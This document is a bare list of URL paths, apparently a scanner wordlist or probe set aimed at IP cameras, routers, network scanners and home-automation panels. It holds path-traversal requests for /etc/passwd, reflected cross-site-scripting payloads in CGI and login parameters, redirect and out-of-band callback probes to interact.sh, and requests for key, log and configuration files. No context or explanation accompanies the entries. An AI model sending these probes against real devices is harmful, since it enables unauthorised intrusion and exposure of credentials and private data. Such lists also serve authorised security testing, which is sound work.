/../../etc/passwd
/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh
/fcgi-bin/wgsetcgi
/html/repository
/services/user/values.xml?var=STATUS
/html/device-id
/_syslog.txt
/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://interact.sh/
/loginLess/../../etc/passwd
/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY
/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY
/self.key
/api/config
/net/net/net.html
/?action=stream
/config/cam_portal.cgi
/mobile.html

/amr
/eSCL/ScannerCapabilities
/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e
/acs/..;/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e
/cgi-bin/nobody/Search.cgi?action=scan
/rootDesc.xml
